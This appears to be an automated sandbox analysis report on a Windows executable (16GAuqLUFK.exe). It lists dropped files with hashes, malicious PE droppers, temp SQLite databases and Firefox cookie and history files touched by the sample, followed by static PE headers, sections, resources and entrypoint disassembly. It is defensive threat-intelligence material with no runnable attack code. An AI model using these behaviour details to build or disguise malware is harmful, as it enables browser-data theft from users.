SHA-512:	D857DEEE4890E69CDAC3D1BBAABFE7791784B872B3ACF807EEF07856B0D4303D586902EF1D1CC8D5A53DF626097791A9831F96DB9B6C53B02826EE54AF73F9F5
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F..'r..'r..'r..u...'r..u.'r..u.3'r......'r..'s.?'r..u...'r..u.'r..u.'r.Rich.'r.................PE..L.....Kd.................>..........j........P....@...........................".............................................L}..P....... $...........................................................................P...............................text...&<.......>.................. ..`.rdata...9...P...:...B..............@..@.data....g.......&...\|..............@....nuz....A...........................@....rsrc... ........&..................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp2023-12-24T10_44_51.595317+01_00_00_0

Download File

Process:	C:\Users\user\AppData\Local\Temp\16E6.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp2023-12-24T10_44_51.689063+01_00_00_0

Download File

Process:	C:\Users\user\AppData\Local\Temp\16E6.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp2023-12-24T10_44_55.398478+00_59_59.984369_3

Download File

Process:	C:\Users\user\AppData\Local\Temp\16E6.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp2023-12-24T10_44_55.414109+01_00_00_0

Download File

Process:	C:\Users\user\AppData\Local\Temp\16E6.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp2023-12-24T10_44_55.492230+01_00_00_3

Download File

Process:	C:\Users\user\AppData\Local\Temp\16E6.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp2023-12-24T10_44_55.507858+01_00_00_0

Download File

Process:	C:\Users\user\AppData\Local\Temp\16E6.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp2023-12-24T10_44_56.476602+01_00_00_3

Download File

Process:	C:\Users\user\AppData\Local\Temp\16E6.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp2023-12-24T10_44_56.601601+01_00_00_3

Download File

Process:	C:\Users\user\AppData\Local\Temp\16E6.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	modified
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5C42.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\28CC.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB4CE.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\28CC.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB4DF.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\28CC.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB4F0.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\28CC.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\toolspub2.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\3ABE.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	294400
Entropy (8bit):	6.737599818680579
Encrypted:	false
SSDEEP:	6144:EeJDc1xNSLKxX1ZfSrw6o6f1DffsD9W2fEutV:EaDcdS8ZfgxbsBlfEMV
MD5:	85E39A9EF8C8F1BEEF408EFC12256FF4
SHA1:	DF2F4AE304B6F7AB41E2906D1A790BAA2BB48F11
SHA-256:	DAC1CB9F826E0B64FA0FDF4CF8568D4D746F7401A31DDB534EE3E57D8541FE2C
SHA-512:	7E98F4441C9B1BE569BB7C134E7C80719BA532CED69904C84650881242B02175CBE7456802A51C09C1F77E75D6EBEE1B91F8AC0AB95F7D713BCAD8AB62360367
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 51%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................................P............Y.......................Rich...................PE..L...hr.d.............................!............@.........................................................................,...P.......h7..............................................................@...............$............................text............................... ..`.rdata...9.......:..................@..@.data....h...0...&..................@....zona...A............B..............@....rsrc...h7.......8...F..............@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\eehrggh

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	248887
Entropy (8bit):	7.999321226657639
Encrypted:	true
SSDEEP:	6144:4nNgXCQ33eNj2ziH9x9/SpXUYIs4+Mow5ko9T1h2pJRrvT:1XCTj2zy9/mEs8TP9T1ENrvT
MD5:	80AEEFACF2D52A7490F28BE2C7D4CC48
SHA1:	B49707373E7591E613F837C57AB971C8C501264B
SHA-256:	F8D45F9F0B90C9A004B4C8BF4BFB3FE8159C071F4F9F75C82FB5F1D8AA897045
SHA-512:	385A5DFB220696F8D2E65B25B6E8B0E1CE01A1A40EA31E60083279B511D2D8237AA0166448A122985986E2D180EA2E15352813A1C749B0694B6F1D5D61D80CFE
Malicious:	false
Preview:	..8r<.....^......E.8..9..SQQ.6.=(...g.q..`..n..5.x5t\|s..u.....Bt.....>....a....R...N.......lp.......6..du.O.D...= ......47....N..>!..$P$..S...".M.1$P>!kd;...l.+<.>..+...3.y7.......O.u....@..v...CBXx.n...6;F.B.6......"na$Z........B.:\|...z....6.e..\|..!..............-..7?u.N..'>....5.Q,G..3EF.....\5.....3\|(.JA>x..oV.$..r.[.%..Lp.........O(N.5A..'.h4K......xG.n~...o{...[...L9d9z.o.U\z..TLZ....-Xz...~r...Q&.G..Sa.4s`..QTG....W%.J1..4...rk....v..l.. .x.#..x....,>v>o.Dp.NH.~.....1....nF......m.....\|@.?..<..n0...0..2,.....:.2..%.oy.:.o..@.^....\{f....H........\..%,.u.9._..?Kq...Q7. Y`...;.XW..q.M"..#...3.i....=W.e..0...\|\|....%0.)z."..'..Bw..d%.KJ)R.2...@X........B=U...X<.@.~..h..... %..U..v..T%A8..F6mM(..~. ...A:.g.gT.^-\|C.Vx.h.\.w.Ax7.o.1j.u).C:.-y..(D...8..hic!.~........w/h..N.)...?H}.!...b..c..xH.. O...Gf......o.rIS4k..X...a......ZG.d&z?.$z...,~HG.N..f.T..\..U.w.:.d..).]<..t..Q.o....zd1...c..3.u...7r.*........'x.,.6[.G.V.....aPUw.

C:\Users\user\AppData\Roaming\eieeggj

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	352256
Entropy (8bit):	6.707647692710539
Encrypted:	false
SSDEEP:	6144:L28mTEyDdlL1Edry9jK35MHXbVJa2f8e7I7z3hf3prKXqWU:LnmTEydlJ9j80XbVX8e7I7Dov
MD5:	FCD15E71512E00AF86732FB04281CF03
SHA1:	B92A182397E196D9B4E1C2344D8D022F19CCE009
SHA-256:	7157ECB7914F8782239CC0160A3CD6FF622E204651D957AC7846B4AD7E7D4343
SHA-512:	DEDB27F118D9EA9043939B66B1D3F2CB422956D5A3426BA23FF0DF932C209B3CAB5557430DAF35E638044C515303C617558525C3C3A0D32F57F0A4A282EB448A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 70%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................................P............Y.......................Rich...................PE..L....A4c.............................!............@..................................S.......................................*..P....... ...............................................................................$............................text............................... ..`.rdata...7.......8..................@..@.data....h...@...&...,..............@....niwodilA............R..............@....rsrc... ............V..............@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\eieeggj:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\ireeggj

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	294400
Entropy (8bit):	6.737599818680579
Encrypted:	false
SSDEEP:	6144:EeJDc1xNSLKxX1ZfSrw6o6f1DffsD9W2fEutV:EaDcdS8ZfgxbsBlfEMV
MD5:	85E39A9EF8C8F1BEEF408EFC12256FF4
SHA1:	DF2F4AE304B6F7AB41E2906D1A790BAA2BB48F11
SHA-256:	DAC1CB9F826E0B64FA0FDF4CF8568D4D746F7401A31DDB534EE3E57D8541FE2C
SHA-512:	7E98F4441C9B1BE569BB7C134E7C80719BA532CED69904C84650881242B02175CBE7456802A51C09C1F77E75D6EBEE1B91F8AC0AB95F7D713BCAD8AB62360367
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 51%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................................P............Y.......................Rich...................PE..L...hr.d.............................!............@.........................................................................,...P.......h7..............................................................@...............$............................text............................... ..`.rdata...9.......:..................@..@.data....h...0...&..................@....zona...A............B..............@....rsrc...h7.......8...F..............@..@................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.707647692710539
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	16GAuqLUFK.exe
File size:	352'256 bytes
MD5:	fcd15e71512e00af86732fb04281cf03
SHA1:	b92a182397e196d9b4e1c2344d8d022f19cce009
SHA256:	7157ecb7914f8782239cc0160a3cd6ff622e204651d957ac7846b4ad7e7d4343
SHA512:	dedb27f118d9ea9043939b66b1d3f2cb422956d5a3426ba23ff0df932c209b3cab5557430daf35e638044c515303c617558525c3c3a0d32f57f0a4a282eb448a
SSDEEP:	6144:L28mTEyDdlL1Edry9jK35MHXbVJa2f8e7I7z3hf3prKXqWU:LnmTEydlJ9j80XbVX8e7I7Dov
TLSH:	8D748C5172E2C433EAE319348574C7B7097B78725929558FA6E42F7A7F703E0A620F0A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................................P...............Y...........................Rich....................PE..L....A4c...........

File Icon


Icon Hash:	0b3164646d311f46

Static PE Info

General

Entrypoint:	0x402108
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x63344101 [Wed Sep 28 12:41:37 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	ba5e0b10d569bda0bb8cd84584885595

Entrypoint Preview

Instruction
call 00007F0E39088BD1h
jmp 00007F0E3907F21Eh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [00436468h], eax
mov dword ptr [00436464h], ecx
mov dword ptr [00436460h], edx
mov dword ptr [0043645Ch], ebx
mov dword ptr [00436458h], esi
mov dword ptr [00436454h], edi
mov word ptr [00436480h], ss
mov word ptr [00436474h], cs
mov word ptr [00436450h], ds
mov word ptr [0043644Ch], es
mov word ptr [00436448h], fs
mov word ptr [00436444h], gs
pushfd
pop dword ptr [00436478h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0043646Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00436470h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0043647Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [004363B8h], 00010001h
mov eax, dword ptr [00436470h]
mov dword ptr [0043636Ch], eax
mov dword ptr [00436360h], C0000409h
mov dword ptr [00436364h], 00000001h
mov eax, dword ptr [00434008h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [0043400Ch]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000FCh]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x32afc	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3c000	0x20820	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x30000	0x224	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2ee06	0x2f000	False	0.6144240359042553	data	7.034748545360275	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x30000	0x37a2	0x3800	False	0.3935546875	OpenPGP Public Key Version 3	5.464556411499255	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x34000	0x681c	0x2600	False	0.21792763157894737	OpenPGP Public Key	2.352999045647301	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.niwodil	0x3b000	0x241	0x400	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3c000	0x20820	0x20a00	False	0.5733881106321839	data	5.989754055870066	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
AFX_DIALOG_LAYOUT	0x57a98	0x2	data	Tatar	Russia	5.0
AFX_DIALOG_LAYOUT	0x57aa0	0x2	data	Tatar	Russia	5.0
AFX_DIALOG_LAYOUT	0x57aa8	0x2	data	Tatar	Russia	5.0
PERETIKIJEGUKOGORUZESOJEKUJECE	0x56e58	0xbf6	ASCII text, with very long lines (3062), with no line terminators	Tatar	Russia	0.5996080992815154
RT_CURSOR	0x57ab0	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	Tatar	Russia	0.43506493506493504
RT_CURSOR	0x57c00	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tatar	Russia	0.30810234541577824
RT_CURSOR	0x58aa8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tatar	Russia	0.48014440433212996
RT_ICON	0x3cd70	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tatar	Russia	0.7969043151969981
RT_ICON	0x3de30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tatar	Russia	0.4538912579957356
RT_ICON	0x3ecd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tatar	Russia	0.5970216606498195
RT_ICON	0x3f580	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tatar	Russia	0.673963133640553
RT_ICON	0x3fc48	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tatar	Russia	0.7565028901734104
